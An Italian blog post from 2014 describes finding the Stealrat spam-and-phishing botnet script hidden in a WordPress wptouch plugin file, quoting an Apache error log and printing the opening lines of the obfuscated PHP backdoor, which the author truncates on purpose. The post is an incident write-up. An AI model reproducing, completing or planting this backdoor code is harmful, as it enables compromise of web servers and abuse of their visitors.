mercoledì 17 settembre 2014

Stealrat BotNet in Php su Wordpress

Sulla stessa macchina in cui era presente quanto descritto a questo post al momento di avviare apache venivano segnalati anche questi errori

Tue Sep 16 16:25:18 2014] [error] [client xxx.xxx.xxx.xxx] PHP Warning:  file_exists(): open_basedir restriction in effect. File(/var/www/vhosts/xxxxxxxx/httpdocs/wp-content/wptouch-data/themes/configOzP.php/readme.txt) is not within the allowed path(s): (/var/www/vhosts/xxxxxxxxxx/httpdocs/:/tmp/) in /var/www/vhosts/xxxxxxxxxxxxx/wp-content/plugins/wptouch-pro-3/core/class-wptouch-pro.php on line 1209

(Sono state omesse le informazioni sensibili)

andando a dare un'occhiata al plugin wptouch nel file indicato si trova il codice sottoriportato (riporto al solito le prime righe per evitare usi illeciti)
Anche in questo caso ci si trova davanti a codice Php offuscato e si alza la soglia di attenzione
--------------------------------------
<?php
@error_reporting(0); 
@ini_set(chr(101).chr(114).'ror_log',NULL); 
@ini_set('log_errors',0); 
if (count($_POST) < 2) 

die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321)); 

$v5031e998 = false; 
foreach (array_keys($_POST) as $v3c6e0b8a) 
{ switch ($v3c6e0b8a[0]) 
{ case chr(108): 
$vd56b6998 = $v3c6e0b8a; break; 
case chr(100): $v8d777f38 = $v3c6e0b8a; break; 
case chr(109): $v3d26b0b1 = $v3c6e0b8a; break; 
case chr(101); $v5031e998 = true; 
break; 


if ($vd56b6998 === '' || $v8d777f38 === '') die(PHP_OS.chr(49).chr(49).chr(43).md5(0987654321)); 
$v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions')); 
$v01b6e203 = @$_POST[$vd56b6998]; 
$v8d777f38 = @$_POST[$v8d777f38]; 
$v3d26b0b1 = @$_POST[$v3d26b0b1]; 
if ($v5031e998) 
{ $v01b6e203 = n9a2d8ce3($v01b6e203); 
 $v8d777f38 = n9a2d8ce3($v8d777f38); 
 $v3d26b0b1 = n9a2d8ce3($v3d26b0b1); 

$v01b6e203 = urldecode(stripslashes($v01b6e203)); 
$v8d777f38 = urldecode(stripslashes($v8d777f38)); 
$v3d26b0b1 = urldecode(stripslashes($v3d26b0b1)); 
if (strpos($v01b6e203, '#',1) != false) 

$v16a9b63f = preg_split('/#/', $v01b6e203); 
$ve2942a04 = count($v16a9b63f); 
} else { 
$v16a9b63f[0] = $v01b6e203; 
$ve2942a04 = 1; 
--------------------------------------

in questo caso la ricerca su Internet riporta molti riferimenti con addirittura una sorta di manuale di istruzione pubblicato da TrendMicro. Si tratta di uno script da BotNet denominato Stealrat nato per fare sostanzialmente spamming e pishing
-
Etichette: , ,

Nessun commento:

Posta un commento

Iscriviti a: Commenti sul post (Atom)

Update Plotly Dash Csv

    from dash import Dash , html , dcc , callback , Output , Input , State import plotly . express as px import pandas as pd import...

  • Creare un grafico animato con Python/Matplotlib
    In questo post viene indicato come creare uno scatterplot dinamico basato da dati ripresi da un file csv (nel dettaglio il file csv e' c...
  • Arduino e CH376S
    Questo post e' a seguito di quanto gia' visto nella precedente prova Lo scopo e' sempre il solito: creare un sistema che permet...
  • ESP32-2432S028R e LVGL
    La scheda ESP32-2432S028R monta un Esp Dev Module con uno schermo TFT a driver ILI9341 di 320x240 pixels 16 bit colore.Il sito di riferiment...